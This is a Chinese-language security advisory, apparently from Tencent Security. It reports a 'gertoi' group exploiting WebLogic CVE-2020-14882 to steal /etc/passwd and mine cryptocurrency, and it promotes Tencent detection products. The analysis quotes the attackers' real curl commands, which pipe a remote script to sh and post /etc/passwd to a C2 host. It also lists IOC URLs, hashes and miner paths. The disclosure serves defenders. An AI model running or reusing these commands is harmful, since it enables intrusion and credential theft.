腾讯云防火墙成功阻断gertoi团伙利用Weblogic漏洞(CVE-2020-14882)的攻击活动

2021-01-30 10:09:26
腾讯安全云防火墙截获黑客利用Weblogic漏洞(CVE-2020-14882)针对云服务器的攻击行动。如果攻击者利用漏洞攻击得手,就会通过CURL命令将存有Linux系统各类账号密码的文件/etc/passwd上传至C2服务器,从而窃取失陷系统的关键敏感信息,同时再利用失陷服务器挖矿。

一、概述

腾讯安全云防火墙截获黑客利用Weblogic漏洞(CVE-2020-14882)针对云服务器的攻击行动。如果攻击者利用漏洞攻击得手,就会通过CURL命令将存有Linux系统各类账号密码的文件/etc/passwd上传至C2服务器,从而窃取失陷系统的关键敏感信息,同时再利用失陷服务器挖矿。腾讯安全根据发现的恶意程序文件名,将该团伙命名为gertoi团伙。

腾讯安全专家在黑客控制的服务器上发现与挖矿等相关的恶意程序,这些恶意程序会清除竞品挖矿木马,再下载新的挖矿木马。

编号为CVE-2020-14882weblogic高危漏洞,为Oracle官方于202010月发布公告修复的数百个高危漏洞之一。未经授权的攻击者可以绕过WebLogic后台登录限制,直接远程利用反序列化漏洞,从而完全接管WebLogic服务器,风险极大。

腾讯安全系列产品已针对Gertoi黑产团伙进行升级响应,具体清单如下:

应用场景

安全产品

解决方案

腾讯T-Sec

威胁情报云查服务

SaaS

1Gertoi团伙相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1Gertoi团伙相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

Cloud FirewallCFW

基于网络流量进行威胁检测与主动拦截,已支持:

1)已支持识别检测Gertoi团伙关联的IOCs

2)已支持检测和拦截Weblogic未授权命令执行漏洞(CVE-2020-14882/14883

有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

Cloud Workload ProtectionCWP

1)已支持查杀Gertoi团伙相关木马程序;

2)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

(腾讯御界)

1)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

二、详细分析

腾讯云防火墙检测到黑客利用Weblogci漏洞CVE-2020-14882针对云主机的攻击,攻击源IP144.217.207.100


漏洞攻击后执行的恶意命令为:

curl http[:]//144.217.207.100:2222/gertoi | sh

gertoi是另外一条命令:

curl --data-binary "@/etc/passwd" http[:]//144.217.207.100:2223

curl通过POST请求将保存Linux账号密码的文件/etc/passwd上传至服务器

144.217.207.100:2223,接着服务器端通过 “GET request for /”命令来接收数据。


/etc/passwd文件中保存了大量的账号密码信息,服务器被攻击成功可能导致用户敏感信息泄露。


此外,在黑客控制的服务器上还发现与挖矿相关的攻击样本。


其中,Code文件中包含清除其他竞品挖矿木马的代码:


根据黑客服务器的挖矿木马配置信息发现,如果攻击得手,会在以下目录安装挖矿木马:

/var/tmp/dasdawdasdawdas

/tmp/dasdawdasdawdas

/dev/shm/dasdawdasdawdas


IOCs

URL

http[:]//144.217.207.100:2222/gertoi

http[:]//144.217.207.100:2222/download

http[:]//144.217.207.100:1231/.code

http[:]//144.217.207.100:2223

http[:]//144.217.207.100:1231/.dddasd.tar.gz


MD5

gertoi 

7fe7871cfcd6a3eade11dc9f9f8925d6


code

78818412331e180b5479be68a48b797d

最新资讯